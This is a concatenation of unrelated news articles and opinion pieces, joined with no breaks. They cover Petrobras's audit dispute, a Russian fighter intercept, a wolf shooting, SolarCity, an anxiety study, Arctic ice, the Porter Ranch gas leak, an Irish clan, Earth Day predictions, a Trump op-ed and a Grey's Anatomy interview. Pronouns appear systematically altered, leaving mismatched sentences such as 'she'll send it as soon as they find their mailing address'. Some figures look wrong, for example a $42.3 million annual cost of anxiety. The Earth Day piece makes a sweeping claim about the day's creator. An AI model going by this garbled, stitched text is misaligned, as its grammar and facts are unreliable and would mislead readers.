“The Internet has changed the life of a short film,” they say. “It used to be you make a short, show it at some festivals, and that was it. Now it can live forever because so many sites just want content or stuff to put on a Facebook page.” Which has led to a proliferation of “hundreds and hundreds” of three- to four-minute docs that Godfrey describes as “perfect for the Internet” but not necessarily something you would want to show on a big screen. “If it's a three- or four-minute piece, I can tell within a minute if it is going to be one of those type of films,” Godfrey says. “It's profile of an artist or a chef or somebody says something sort of interesting. It's the theory of the least objectionable content, you know? And people will share that, and that is great. But it is not right for us.”
———
Okay. There it is—the common mistakes many short filmmakers make. Disagree? Have other ones you'd like to add? List 'em in the comments below.
Brazil's Petrobras failed to get its third-quarter earnings approved by PriceWaterhouseCoopers as the auditing firm demanded wider investigation into a corruption scandal plaguing the state-run oil company, newspaper O Estado de S.Paulo said on Saturday.
Directors of Petroleo Brasileiro SA, as the oil firm is formally known, halted a Friday board meeting before making any decisions and rescheduled it for Tuesday, a source told Reuters without providing details. A possible fuel price increase was expected to be discussed on Friday.
Estado reported that Petrobras' board, which is presided by Finance Minister Guido Mantega, spent the meeting discussing how to handle PwC's demands for more investigation into an alleged corruption scheme uncovered by Brazil's federal police.
PriceWaterhouseCoopers, which has been auditing Petrobras' financial statements since 2012, refused to sign off on the firm's third-quarter earnings and threatened to take the case to U.S. authorities, Estado said. Petrobras' shares are listed on several different exchanges, including São Paulo's BM&FBovespa and the New York Stock Exchange.
PwC's representatives did not immediately respond to a request for comment from Reuters. To Estado, the auditing company said it would not make comments on its clients.
Petrobras' representatives were not immediately available to comment.
Brazil's federal police has been investigating a scam that allegedly received kickbacks from Petrobras contractors and funneled funds to President Dilma Rousseff's Workers Party and its allies in Congress.
The allegations were made in plea bargain statements made by former Petrobras executive Paulo Roberto Costa and a black-market money dealer called Alberto Youssef, who were arrested in March in a money laundering investigation.
Petrobras announced last week it was hiring two law firms to independently investigate the corruption allegations, which were a key theme in the run-up to the presidential election won by Rousseff last weekend.
(Reporting by Walter Brandimarte and Marta Nogueira; Editing by Stephen Powell)
A Russian fighter jet came within five feet of a U.S. Air Force reconnaissance aircraft over the Baltic Sea on Monday, in an encounter the American pilot determined was unsafe.
The incident occurred Monday morning as an RC-135 reconnaissance aircraft flew in international airspace above the Baltic Sea.
It was intercepted by a Russian Su-27 Flanker fighter jet, which approached at a high speed.
The Russian fighter “came within several feet” of the RC-135, according to Capt. Joseph Alonso, a spokesperson for U.S. European Command. A separate defense official said the fighter came within five feet of the RC-135 as it flew alongside it for several minutes.
The pilot of the American aircraft determined that the Russian aircraft's actions were “unsafe” because of its “high rate of closure speed and poor control of the aircraft” said Alonso.
They added that the RC-135 was flying in international airspace with its transponder on, making it identifiable to other aircraft.
“We were flying in international airspace and did nothing to provoke this behavior,” said Capt. Jeff Davis, a Pentagon spokesperson, told reporters Tuesday.
“Such unsafe actions have the potential to cause serious harm and injury to all involved,” they added. “Russia is certainly within its right to exercise within international airspace but we want them to respect international standards for safety to prevent accidents.”
The Russian Defense Ministry countered with a different narrative of the intercept.
According to the Russian news agency Interfax the Russian Defense Ministry accused the RC-135 of performing provocative maneuvers toward the Russian fighter.
“During the escorting, the RC-135 crew made an attempt of closing with the Russian fighter, performing a provocative turnaround toward the Su-27,” the agency quoted the Russian Defense Ministry as saying.
“The Russian pilot reacted to the maneuver of the RC-135 and then continued escorting the U.S. reconnaissance airplane until the latter changed the direction of its flight away from the Russian border,” the ministry said.
The ministry added that after the 10-minute encounter, another RC-135 entered the same area and was also intercepted by a Russian Su-27 fighter.
After the incident, the RC-135 pilot determined the Russian's pilots actions were unsafe. Various factors go into determining whether an incident should be ruled unsafe including distance, speed, altitude, rate of closure and visibility.
Davis noted that the “vast majority” of intercepts of American aircraft by the Russian military are safe encounters. They labeled Monday's incident “the exception, not the norm.”
source: ABC News
The shooting of a wolf on the Palouse is being investigated by state fish and wildlife officers.
According to WDFW, a farmer spotted the wolf on their land southwest of Pullman and then pursued it in a vehicle for several miles.
“The shooting does not appear to have been associated with a defense-of-life action, nor did it take place under the statutory authority to shoot and kill a wolf that is caught in the act of attacking livestock in the Eastern Washington recovery zone,” said agency assistant wildlife director Nate Pamplin.
The incident was reported by a witness on Sunday. It occurred in that part of the state where wolves are federally delisted, though they remain under state protections.
Though most agricultural operations in the Palouse are centered on wheat and other cereal grains, there are cattle outfits in some valleys. There has been a pair of wolves spotted between Ewan and Washtucna, and a few years back a wolf was shot on the Palouse just across the border in Idaho.
Pamplin says that once the investigation is finished, the case will be sent to Whitman County prosecutors for possible charges.
another bright idea Now Elon Musk wants to revolutionize solar panel production
Thanks in part to Elon Musk, the world's biggest and most advanced solar panel factory could be built in the U.S. in the coming years.
The Silicon Valley entrepreneur, fresh off announcing an effort to spur growth in the electric auto industry by opening up access to hundreds of Tesla Motors patents, on Tuesday pushed the cleantech envelope even further, announcing a bid to massively expand the solar panel industry.
Musk, chair of the solar panel installation giant SolarCity, told reporters that in the coming years the company plans to build a solar panel factory in the U.S. that's “an order of magnitude bigger than any of the plants that exist” anywhere in the world today.
SolarCity is responsible for about a quarter of America's residential solar panel installations every month — three times as much as its closest competitor. Its market dominance has been earned in part through its “zero-down” financing model. But that's not enough. Musk says they worry that the company's ongoing growth will be so rapid that it will start to encounter solar panel shortages, despite what now is an international glut of mostly Chinese-made panels.
So SolarCity is jumping into the development and manufacture of advanced solar panels through the acquisition for $200 million or more of Silicon Valley-based solar panel company Silevo, which has developed highly efficient rooftop photovoltaic cells. Using more efficient cells means fewer panels are needed for each rooftop, helping to push down the price of residential solar systems.
“If we don't do this, we felt that there was risk of not being able to have the solar panels that we need to expand the business in the long term,” Musk said Tuesday during a call with reporters. “The rate at which solar panel technology is advancing — at least for the panels that are being made at large scale — it's really not fast enough. We're seeing high-volume production of relatively basic panels, but not high-volume production of advanced panels, so we think it's important that the two be combined.”
In a blog post published Tuesday, SolarCity described its manufacturing ambitions:
We are in discussions with the state of New York to build the initial manufacturing plant, continuing a relationship developed by the Silevo team. At a targeted capacity greater than 1 GW within the next two years, it will be one of the single largest solar panel production plants in the world. This will be followed in subsequent years by one or more significantly larger plants at an order of magnitude greater annual production capacity.
Ultimately, Musk says, they want to develop such advanced panels and manufacture them at such high volumes that fossil fuels simply cannot compete. “To be able to have solar power compete on an unsubsidized basis with fossil fuel energy coming from the grid, it's critical that you have high efficiency solar panels,” they said.
Women are almost twice as likely to experience anxiety as men, according to a review of existing scientific literature, led by the University of Cambridge. The study also found that people from Western Europe and North America are more likely to suffer from anxiety than people from other cultures.
The review, published today in the journal Brain and Behavior, also highlighted how anxiety disorders often provide a double burden on people experiencing other health-related problems, such as heart disease, cancer and even pregnancy.
Anxiety disorders, which often manifest as excessive worry, fear and a tendency to avoid potentially stressful situations including social gatherings, are some of the most common mental health problems in the Western world. The annual cost related to the disorders in the United States is estimated to be $42.3 million. In the European Union, over 60 million people are affected by anxiety disorders in a given year.
There have been many studies looking at the number of people affected by anxiety disorders and the groups that are at highest risk, and in an attempt to synthesise the various studies, researchers from the University of Cambridge's Institute of Public Health carried out a global review of systematic reviews. Out of over 1,200 reviews, the researchers identified 48 reviews that matched their criteria for inclusion. The research was funded by the National Institute for Health Research.
Between 1990 and 2010, the overall proportion of people affected remained largely unchanged, with around four out of every 100 experiencing anxiety. The highest proportion of people with anxiety is in North America, where almost eight out of every 100 people are affected; the proportion is lowest in East Asia, where less than three in 100 people have this mental health problem.
Women are almost twice as likely to be affected as men, and young individuals -- both male and female -- under 35 years of age are disproportionately affected.
The researchers also found that people with other health conditions are often far more likely to also experience anxiety disorders. For example, around one in ten adults (10.9%) with cardiovascular disease and living in Western countries are affected by generalised anxiety disorder, with women showing higher anxiety levels than men. People living with multiple sclerosis are most affected -- as many as one in three patients (32%) also have an anxiety disorder.
According to first author Olivia Remes from the Department of Public Health and Primary Care at the University of Cambridge: "Anxiety disorders can make life extremely difficult for some people and it is important for our health services to understand how common they are and which groups of people are at greatest risk.
"By collecting all these data together, we see that these disorders are common across all groups, but women and young people are disproportionately affected. Also, people who have a chronic health condition are at a particular risk, adding a double burden on their lives."
Obsessive compulsive disorder (OCD) -- which is an anxiety disorder characterized by obsessions and compulsions -- was found to be a problem in pregnant women and in the period immediately after birth. In the general population, only one in a hundred people are affected by OCD, but the proportion with the disorder was double in pregnant women and slightly higher in post-partum women.
However, the analysis also showed that data on some populations was lacking or of poor quality. This was particularly true for marginalised communities, such as indigenous cultures in North America, Australia and New Zealand, and drug users, street youth and sex workers. Anxiety disorders also represent an important issue among people identifying as lesbian, gay, and bisexual; however, there are not enough studies in these populations, and those that have looked at it are of variable quality
Dr Louise Lafortune, Senior Research Associate at the Cambridge Institute of Public Health, explains: "Anxiety disorders affect a lot of people and can lead to impairment, disability, and risk of suicide. Although many groups have examined this important topic, significant gaps in research remain."
Professor Carol Brayne, Director of the Cambridge Institute of Public Health, adds: "Even with a reasonably large number of studies of anxiety disorder, data about marginalised groups is hard to find, and these are people who are likely to be at an even greater risk than the general population. We hope that, by identifying these gaps, future research can be directed towards these groups and include greater understanding of how such evidence can help reduce individual and population burdens."
The Arctic Ocean is becoming more active as the region continues to lose sea ice at an alarming rate. This typically quiet ocean has started churning and mixing more than usual, according to a study published in the latest issue of Geophysical Research Letters.
(From Discovery News) — Scientists are concerned that these changes in ocean movement could be speeding up the melting of Arctic sea ice. During a two-week period in summer 2007, Arctic sea ice declined as much as 81,081 square miles per day.
Satellite images have captured stark evidence over the years that show the shrinking sea ice in the Arctic Ocean, as well as retreating glaciers on land. Here, we present a few hot spots.
The Beaufort Sea, one of the outermost seas of the Arctic Ocean, is a vital hunting ground for polar bears, which depend on thick, vast ice sheets to raise their young and protect themselves. These satellite images show the extent to which the animals are losing their habitat.
Credit: USGS
The town of Barrow, Alaska sits on the coast of the Beaufort Sea. Typically, ice forms along the coast in the winter, and then melts or breaks away by mid-July. These satellite images show that the ice melting in this area has dramatically increased over time.
Credit: USGS
According to the National Snow and Ice Data Center, ice melting in the East Siberian Sea, also a part of the Arctic Ocean, spiked to a degree not seen in the history of satellite recording.
The Bering Glacier is the largest and longest glacier in continental North America. These satellite images show the glacier has retreated more than three miles and has thinned by more than 200 feet from 1996 to 2005.
Credit: USGS
These images of the South Cascade Glacier in Washington state show a steady retreat from 2000 to 2006. This rapid melting can threaten low-lying and coastal towns and communities.
Credit: USGS
Some satellite images were acquired through a team effort from the U.S.'s top spies and climate experts. The New York Times reported that spy satellites and some of the world's most cutting-edge intelligence-gathering equipment are used to study the effects of climate change through CIA data-sharing programs.
Source: USGS/NASA Earth Observatory
One of the worst environmental disasters of the decade is currently underway in a quiet community 25 miles northwest of Los Angeles. Putrid, methane-rich natural gas has been spewing into the air at an estimated rate of nearly 1,300 metric tons per day for over two months. Experts are calling it the climate version of the BP oil spill, and the leak isn't going to be contained anytime soon.
Natural gas is often touted as a cleaner energy source than oil or coal, because of the lower greenhouse gas emissions associated with burning it. But as this disaster highlights, there are insidious risk to natural gas production. Coupled with weak regulation, they can make this energy source as dirty as the fossil fuels it's meant to replace.
Advertisement
“The science is crystal clear: if you allow the methane to leak, you can wipe out its climate benefits,” Tim O'Connor, director of the Environmental Defense Fund's Oil and Gas Program in California told Gizmodo.
In fact, everything about the leak is eerily reminiscent of the oil spills that have blackened oceans and beaches for over a century. These parallels underscore a hard truth: we need to transition off carbon-based fuels entirely to fix our planet.
Like 7 Million Cars
On October 23rd, a natural gas leak erupted at a storage well beneath the community of Porter Ranch. The well stores gas carried by pipelines from extraction operations hundreds of miles away in Texas, the Midwest, and the Rocky Mountains.
Advertisement
Your browser does not support HTML5 video tag.Click here to view original GIF
The leak has taken a serious toll on Porter Ranch residents, who for weeks have reported headaches, nausea, dizziness, and other symptoms. Methane is odorless and non-toxic, but natural gas producers inject it with trace quantities of sulfurous chemicals called mercaptans so that leaks can be detected by scent. According to Cyrus Rangan, director of the Toxics Epidemiology Program at LA County's Department of Public Health, the stench from the leak is so foul that residents are having a physiologic response to it.
“People are having very real responses, based on their own sensitivity,” Rangan told Gizmodo. “In terms of acute chemical exposures, this is a really, really big deal.” Rangan estimates that somewhere between four and five thousand families have filed for help, with 2,200 families temporarily relocated so far.
As of this week, the leak has sent over 73,000 metric tons of methane gas skyward, according to estimates published by the Environmental Defense Fund, which is providing real-time updates on the situation. And that's a big problem for our climate. Although short-lived in the atmosphere, methane is a potent greenhouse gas, with up to 80 times the global warming potential of CO2 in the first twenty years of its lifespan. 73,000 metric tons of methane is the global warming equivalent of over six million metric tons of CO2. Put another way, the daily emissions from Porter Ranch are essentially equivalent to sticking seven million additional cars on the road.
Advertisement
Plugging the Hole and Fixing the Problem
The first order of business for California is getting this well plugged. After several failed attempts to stop the flow of gas using conventional methods, SoCalGas began drilling a secondary “relief well” on December 4th. This well will intersect the leaky one and plug it. “After we intercept the well at more than 8,500 feet of measured depth, we will pump heavy fluids and drilling mud into the bottom of the leaking well to stop the flow of gas up from its source, the reservoir,” a statement provided to Gizmodo by SoCalGas, which manages the well, reads. “Once the flow of gas has been stopped, we will pump cement into the well to permanently seal the leak.”
Here's what the entire operation will look like:
Advertisement
Image via SoCalGas
At last check-in, the drilling operation had reached a depth of 3,850 feet, and—in an important milestone—workers have now identified the seven-inch wide leaky gas pipe using magnetic ranging technology.
Still, SoCalGas warns that plugging the leak and stopping the flow of methane could take until the end of March.
Advertisement
Estimates from California's Air and Resources Board shows that total statewide methane emissions rose 25% this fall, dramatically diminishing any climate benefit natural gas industry offers. “SoCalGas recognizes the impact this incident is having on the environment,” SoCalGas spokesperson Anne Silva told Gizmodo in an email. “While working to stop the gas leak and alleviate its impact on the community, we also have been evaluating options to mitigate the environmental impact.”
But whatever mitigation measures SoCalGas takes, the leak highlights the shortcomings of natural gas—and how it's regulated.
Nobody's sure exactly how the Porter Ranch leak started, but a report by the EDF paints a disturbing picture of the state of natural gas pipes around Los Angeles. Nearly 40 percent of the pipes in SoCalGas' jurisdiction are over 50 years old, and they're leaking everywhere. The EDF reports an average of one methane leak every four to five miles across Pasadena, Inglewood, and Chino, three geographically disparate neighborhoods. These leaks vary from less than 1,000 to over 60,000 liters of natural gas per day. That means tens of thousands more cars worth of carbon emissions thanks to crappy infrastructure.
Advertisement
But this isn't just an LA problem. Another report by the EDF estimated over 65 billion cubic feet, or approximately 1.3 million metric tones of natural gas leakage on federal and tribal lands in 2013 alone. “Globally, we know that more methane is leaked into the air from oil and gas infrastructure than the entire gas production of Norway—which is one of the world's leading gas producers,” O'Connor said. “Methane is a significant problem, and in the US, it can erode the climate benefit of the gas industry.”
Nationwide, O'Connor estimates there are approximately 400 underground methane storage areas subject too little to no federal regulation—other Porter Ranch disasters waiting to happen. “These facilities are exempt from federal requirements for underground injections, and they fly under the radar until catastrophes strike,” they said.
And that's not to mention leaks during drilling, transportation through pipelines, and distribution. If we're going to see a net climate benefit from natural gas production over fossil fuels, experts say no more than 3 percent of gas can leak during the entire production process. In some parts of the country, we're well beyond that figure. In other areas, the amount of leakage simply isn't known.
Advertisement
For the first time this year, the EPA has introduced national standards that would directly regulate methane emissions from oil and gas facilities built in the future. But as the EDF points out, these rules say nothing about facilities already in operation. If the natural gas industry wants to sell an environmentally-friendly alternative to oil, all of its infrastructure needs to be air-tight.
“We need to think of natural gas as a bridge fuel, “ O'Connor said. “It's an energy source that can have a benefit, but that benefit is only realized if you keep it in the pipes.”
Follow the author @themadstone
Top image: Crews from SoCalGas and elsewhere work at a relief well located near Porter Ranch. Image via Dean Musgrove/Los Angeles Daily News/AP
Sarah Kelly, an architect in Galway, Ireland, was sitting down to one of their twice-weekly twitter sessions when they happened to see Tuesday night's news from Baltimore that a piece of marble had come crashing through the atrium of City Hall.
As the incoming chieftain of the O'Malley Clan Association, Kelly keeps abreast of news that might be relevant to O'Malley clan members worldwide. Of course, one of the most prominent people with that surname is Martin O'Malley. “I understand we're something like fourth cousins,” they say of the former Maryland Governor, “but I can't swear to that.”
We trust there was no one injured @MartinOMalley and all #omalleyclan are safe. https://t.co/QBOIzIdY76 — O'Malley Clan (@Clanomalley) June 21, 2016
So they tweeted from the O'Malley clan account, @Clanomalley to their 53 followers – to make sure that Martin O'Malley was okay.
This caught the attention of The Baltimore Sun — so we reached out to Kelly for comment.
“I never know what to say on Twitter,” they explained via telephone from Ireland. “Some people are so funny and witty and I'm not really at the races in that way.”
“We're a very old clan but we're new to social media,” they said. Some of the clan's most notable members include a pirate queen named Granuaile, or Grace O'Malley, born in 1530. The O'Malleys, Kelly says, are characterized by their tenacity and their success on both land and water. (Occasionally, they notice a certain O'Malley facial feature, but Kelly declined to say whether the Governor possessed this.)
Kelly has followed Martin O'Malley's career for years. Though they have never met the Governor, their mother saw their band, O'Malley's March, play at a pub in Ireland once. “She thought it was great fun,” Kelly said.
This past weekend, Kelly was appointed chieftain of the O'Malley clan at their 62nd consecutive summer gathering in Limerick, Ireland. Nearly 200 and 250 friends and members of the O'Malley clan attended to participate in genealogy workshops, where they could research their family tree (Kelly themselves is an O'Malley on their mother's side – their grandfather was an O'Malley).
2016 marks the 100th anniversary of the beginning of the Irish uprising against British occupation, and the weekend also included a talk by the son of independence activist Ernie O'Malley, who Kelly calls “a significant figure in the fight for freedom.” (Of course, they said, people have differing views on the Irish struggle for independence – and whether it was justified for the Irish to take arms against the Britain when it was in the middle of the first World War.)
Kelly plans to invite Governor O'Malley to next year's clan gathering, which will take place in their own hometown of Galway, near to Galway County, where the former mayor's own family is from. They have a letter all ready to go, and she'll send it as soon as they find their mailing address. “Obviously he's a busy man,” they said, but they hope they might find time to attend – perhaps with their guitar in tow. “We love if they might play a tune,” they said.
Though the governor may have lost their bid for president, Kelly said they could be eligible to become a future chieftain of the O'Malley clan.Copyright © 2019, The Baltimore Sun
Since 1970, there's been no shortage of Earth Day doomsday predictions.
As the world celebrates a day created by a dude who murdered and composted their girlfriend, Mark J. Perry of the American Enterprise Institute included an old, but fabulous list of the most ridiculous predictions from 1970.
In the May 2000 issue of Reason Magazine, award-winning science correspondent Ronald Bailey wrote an excellent article titled “Earth Day, Then and Now” to provide some historical perspective on the 30th anniversary of Earth Day. In that article, Bailey noted that around the time of the first Earth Day, and in the years following, there was a “torrent of apocalyptic predictions” and many of those predictions were featured in their Reason article. Well, it's now the 46th anniversary of Earth Day, and a good time to ask the question again that Bailey asked 16 years ago: How accurate were the predictions made around the time of the first Earth Day in 1970? The answer: “The prophets of doom were not simply wrong, but spectacularly wrong,” according to Bailey. Here are 18 examples of the spectacularly wrong predictions made around 1970 when the “green holy day” (aka Earth Day) started:
1. Harvard biologist George Wald estimated that “civilization will end within 15 or 30 years unless immediate action is taken against problems facing humankind.”
2. “We are in an environmental crisis which threatens the survival of this nation, and of the world as a suitable place of human habitation,” wrote Washington University biologist Barry Commoner in the Earth Day issue of the scholarly journal Environment.
3. The day after the first Earth Day, the New York Times editorial page warned, “Man must stop pollution and conserve their resources, not merely to enhance existence but to save the race from intolerable deterioration and possible extinction.”
4. “Population will inevitably and completely outstrip whatever small increases in food supplies we make,” Paul Ehrlich confidently declared in the April 1970 Mademoiselle. “The death rate will increase until at least 100-200 million people per year will be starving to death during the next ten years.”
5. “Most of the people who are going to die in the greatest cataclysm in the history of man have already been born,” wrote Paul Ehrlich in a 1969 essay titled “Eco-Catastrophe! “By…[1975] some experts feel that food shortages will have escalated the present level of world hunger and starvation into famines of unbelievable proportions. Other experts, more optimistic, think the ultimate food-population collision will not occur until the decade of the 1980s.”
6. Ehrlich sketched out their most alarmist scenario for the 1970 Earth Day issue of The Progressive, assuring readers that between 1980 and 1989, some 4 billion people, including 65 million Americans, would perish in the “Great Die-Off.”
Trump speaks at a rally in Fairfield, Ct., August 14, 2016. (Michelle McLoughlin/Reuters)
The consensus that voters are revolting against economic conditions ignores other ways that they expect Trump to protect America.
To listen to both their defenders and critics, Donald Trump represents the U.S. version of a new nationalism popping up around the world. I'm not so sure.
In a fairly representative analysis, Politico's Michael Hirsh explained the “new nationalism” as “a bitter populist rejection of the status quo that global elites have imposed on the international system since the Cold War ended, and which lower-income voters have decided — understandably — is unfair.”
Advertisement
Advertisement
James P. Pinkerton, writing for the stridently pro-Trump website Breitbart News, sees nothing less than a “Worldwide Trumpian Majority” forming to oppose globalization in all its forms.
Interestingly, commentators across the ideological spectrum also agree that these trends are fueled by economic conditions — manifested here as outrage at Wall Street and global trade deals — and can be solved by some government response. Both Trump and Hillary Clinton offer similar solutions, such as more trade barriers and massive infrastructure spending.
That interpretation is fine as far as it goes, but I don't think it goes very far. Ultimately, the term “nationalism” distorts more than it clarifies about what's going on with Trump supporters in the United States.
Advertisement
RELATED: White versus White America
Advertisement
First, suggestions that a Trumpian nationalism is rising among all low-income Americans could only be true if all low-income Americans were white. Reading Breitbart's celebrations of populist nationalism or the constant invocations of “We the People” from Trump supporters on social media might leave you with that impression. This is not to say that everyone who supports Trump is a “white nationalist” — which conjures various racist doctrines. Rather, it is to simply point out that Trump's support is overwhelmingly, almost exclusively, white.
Clinton, according to some polls, gets nearly 9 out of 10 Latino voters and 9.9 out of 10 African-American voters. When Trump pointed out a black attendee at one of their rallies and said, “That's my African American,” they might have been speaking literally.
I think commentators focus on the broad-stroke economic arguments because the real issues — the American cultural ones — are so fraught. Simply put, this so-called nationalism in the U.S. is really little more than a brand name for generic white-identity politics.
Advertisement
RELATED: The Buchanan Boys: The Trump Voters Aren't a New Phenomenon
Advertisement
Liberals are uncomfortable discussing this; to do so would acknowledge how they failed the white working-class voters who were once the emotional heart of the Democratic party but are now the core of Trump's support. The Democrats' emotional heart now revolves around a diversity-mania that left many of its traditional voters feeling deserted — or as President Obama once put it, bitterly clinging to their guns and their Bibles.
The Trumpian nationalist right wants to stay focused on economics, because to be open about their cultural appeal would be to admit that they have surrendered to the logic of left-wing identity politics.
This so-called nationalism in the U.S. is really little more than a brand name for generic white-identity politics.
Imagine for a moment you are a member of the working white poor in the parts of America that J. D. Vance writes about in their best-selling Hillbilly Elegy: A Memoir of a Family and Culture in Crisis. Imagine how ridiculous phrases like “white (male) privilege” sound to you. Imagine you are an evangelical Christian, repeatedly told by elites and authority figures that your faith is the source of un-American injustices — but that to suggest Islamic terrorism might have some relationship to Islam is rank bigotry.
Every year, liberal pundits metaphorically rub their hands in glee at the latest demographic projections forecasting the dissolution of the white majority in the United States. Is it so shocking that some white people might not greet that prospect with the same glee — particularly when they have not seen tangible benefits from the immigration that is the source of all that diversity?
Advertisement
#related#Daily, I receive e-mails and comments from people who describe themselves as nationalists – but who are, in fact, making arguments for white culture as if whites were now an oppressed minority in need of an American government that zealously defends their interests. Right or wrong, many of them believe that Trump will protect white culture from the forces of multiculturalism, and Christianity from spreading secularism.
Which brings me back to why I think “nationalism” is a poor word to describe what we're witnessing in this election.
If nationalism is supposed to do anything, it's supposed to unify the country. When I look at these so-called nationalists, though, I don't see a unifying force. I see the latest entrants into a decades-old game of subdividing the country into tribes seeking to yoke government to their narrow agendas.
Caterina Scorsone talks with THR about the shocking twist and why it makes the Shonda Rhimes drama less about a love story and more about "human resilience."
[Warning: This story contains spoilers from the April 23 episode of Grey's Anatomy.]
ABC's Grey's Anatomy stunned viewers Thursday when the long-running Shonda Rhimes medical drama shockingly killed off one of its most beloved characters.
During the episode, fittingly titled "How to Save a Life," Derek Shepherd (Patrick Dempsey) was killed off after their car was struck by a truck and they ended up in a hospital that wasn't trained well enough to save him, forcing Meredith to pull the plug on their husband's life.
The fan favorite's exit came as star Dempsey — one of its last remaining original stars — still had a year left on their contract. The twist also comes amid a season that has seen Grey's focus on Meredith's (Ellen Pompeo) independence after Cristina's (Sandra Oh) move and as their husband Derek went to work for the president in D.C.
Read more 'Grey's Anatomy' Shocker: Star Patrick Dempsey Exits
Derek's death leaves Meredith as a single mother of two, just as the beleaguered couple — who have survived a fatal plane crash, a near drowning and so much more — were discussing expanding their family beyond children Zola and Bailey. Further, it leaves Derek's youngest sister, Amelia (Caterina Scorsone) — who returned to Seattle this season full-time to replace their big brother as head of neuro — to cope with the death of a brother who had been there with them when their father was gunned down during a robbery.
The Hollywood Reporter spoke with Scorsone on Wednesday about how the cast learned of Dempsey's exit and how Derek's death fundamentally changes Grey's Anatomy.
Read more 'Grey's Anatomy's' Shonda Rhimes Explains Patrick Dempsey's Departure
When and how did you learn of Patrick's departure?
Shonda gathered the whole family of us together and sat us down and let us know what was going on. We were all together. We were probably as shocked as the audience will be Thursday night. It was also kind of exciting, in a way, because he's been such a huge part of the show and it has been defining in a lot of ways and now we're moving toward all of these other stories that are now opening up. It's a little bit exciting.
How long ago was that and was Patrick there?
That day and that time feel a little like personal family stuff.
I couldn't imagine killing off a character like Derek; you always think that on this show, Meredith and Derek were "MFEO."
Oh my God. Even reading it…
What did you, as a cast, do after Shonda told you? Did you have a conversation? What was the mood after that initial meeting?
What's so nice about Shondaland is that it is such a family that I think we all processed it together in a really beautiful way as any family would. We were losing this hugely integral part of our group, of our family, and we really get to be there for each other as we processed that shift and move into this new chapter of, "OK, what does our family feel like now? Who are we now?" We were all there for each other and there's an excitement brewing about what this next chapter is going to be.
See more 'Grey's Anatomy's' Famous Departures
Were you surprised by how Derek was killed off? What's the feeling like on set losing such an important part of the Grey's family?
I'm always surprised by every turn we make in Shondaland; it's always shocking. They did a beautiful job with the episode. We knew it was going to happen but didn't know how. I got the script and read it and it's a really compelling episode. I was really carried away. [The writers] really did a beautiful job. I felt all of the emotions that had been earned over 11 seasons of loving this character. I thought the episode and the way they did it packed the kind of emotional punch that we deserve after living and loving this character for so long.
What was Patrick's last day on set like? Did they have any parting words before they left?
I was not there on their last day.
Have you heard what that final moment was like with them from any co-stars?
I actually do not know.
What was your last conversation like with Patrick?
That's private "brother-sister" stuff.
How do you think Derek's death fundamentally changes the show?
It is a fundamental change. I don't know how it will be interpreted by the writers or audience, but I think it really grounds the show in that it's about human resilience. All of these characters have been through so much change and growth — and so many of these characters have suffered huge losses and huge triumphs and have persevered and overcome. It finally drives home the point that [Grey's Anatomy] is not just about a love story; this is about human resilience.
How will Derek's death affect Amelia? Could this prompt them fall back into addiction, since she's lost their father and now brother?
It's going to be a huge blow. They definitely will be impacted. It's a devastating blow to Amelia.  They are arguably the most important person that's ever been a part of their life. They were very close when they were young — even before they lost their father — and then that completely bonded them in this trauma bond forever. Plus they share so many passions with surgery. He's been both a brother and father figure to them in so many ways and an idol in terms of their career. She's had such a history of loss, especially with the men in their life that they have loved. This is going to be a huge, devastating blow to Amelia. We will have to see how they handle it; it will not be boring.
See more The Couples of Shondaland: 'Grey's Anatomy,' 'Private Practice,' 'Scandal'
Might Derek's death bring Amelia closer to Owen (Kevin McKidd)?
I can imagine that Amelia may be pulled in two directions about it. On the one hand, Owen is this incredible person in their life who she's been able to share some of their darkest traumas with and who she's found support and understanding in. That could draw them together. And at the same time, losing yet another important male in their life would probably scare the heck out of her, in terms of allowing themselves to be vulnerable again. It's such a rich question. I'm excited to find out what the long game is there.
How might Meredith respond to Derek's death?
He's the love of their life. He's the father of their children. They will be changed forever. As Amelia will be changed forever. Someone couldn't go through something like this and lose someone this significant in their life without being fundamentally altered for the rest of their lives. It's going to unfold; you don't react to a loss like that all at once. We'll see how they handle it and copes with it.
Will Meredith blame herself? Derek came back from D.C. because another woman answered their cell phone, which set up this whole storyline.
I don't know how she'll react internally to that stuff.
Amelia and Meredith were the two people closest to Derek — and the last interaction they had wasn't a good one (about not hurting Owen). Might they lean on one another in the wake of Derek's death?
They have a really interesting journey after Derek dies. Yes, they are both impacted in profound ways and they react in different ways. We will definitely explore their relationship with one another through their grief and through this loss of this fundamentally important linchpin in their lives.
See more When Leads Vanish: TV Shows That Have Killed Off Major Characters
What can you say about their different reactions to their death? There's shock, but might someone act out? Shut down? There's so much that can happen at this point.
One of the things that has been handled really beautifully is the writers have shown us, with all the different characters, really interesting and varied ways of reacting to and processing Derek's death. One of the great things about that is it illustrates how personal grief is and how every person is going to grieve and react differently. That's one of the beautiful things about where the story goes from there: seeing all of these people who love each other so profoundly and delicately and intricately and in all of these layered relationships and seeing all of them react to such a huge loss.
How will the rest of Grey Sloan Memorial respond? Whose reaction might surprise viewers the most?
That's a tough one to call. There are a lot of really diverse reactions. I don't know whose will surprise viewers the most. Grief is surprising. A lot of people who have encountered grief are often shocked that it didn't look the way they thought it would look. And you see that as this group of people moves through this. There are some surprising reactions, for sure.
Meredith is now a widowed mother of two. How will Amelia help out with the family?
Amelia will help [in] whatever way Meredith needs. Connection is so profoundly important to Amelia. They have been lonely so many times and for so much of their life for various reasons — because of loss, trauma, tragedy and isolation due to drug use — and one of the things that has helped them grow were the connections they made when they were on Private Practice with Addison and all of their friends there and they started learning how to make relationships and create family. When they were invited into Derek and Meredith's life, that was a huge deal for them To be invited to help take care of the children with them in Seattle was a huge deal for them and they do really value that family connection with Meredith and with their niece and nephew. They will be there in whatever way Meredith wants them to be.
Read more 'Grey's Anatomy's' Shonda Rhimes: "Fans Should Be Worried" About Meredith and Derek
Will there be a funeral? Could any familiar faces return? Kate Walsh, their mother, sisters…
That's a story point I don't know that I can talk about.
How would you describe the remainder of the season? This whole season has been about exploring Meredith and their standing on their own without Cristina — and now without Derek. Where does the show go from here?
There's lots of talk among us about where we think it will go or what we want to have happened. I think that moving out of this huge thing that was unimaginable has been actually quite incredible because a lot of stories are opening up and becoming richer. It impacts everyone so profoundly that it created a really rich soil for new things to grow in. There's a lot going on and a really electric feeling about what is going to happen from here. I'm excited about next season to find out. Anything could happen. And in Shondaland, anything usually does.
You've filmed a couple of episodes now without Patrick. What's the mood on set like now? Derek was gone from five episodes earlier this season but now it's so different.
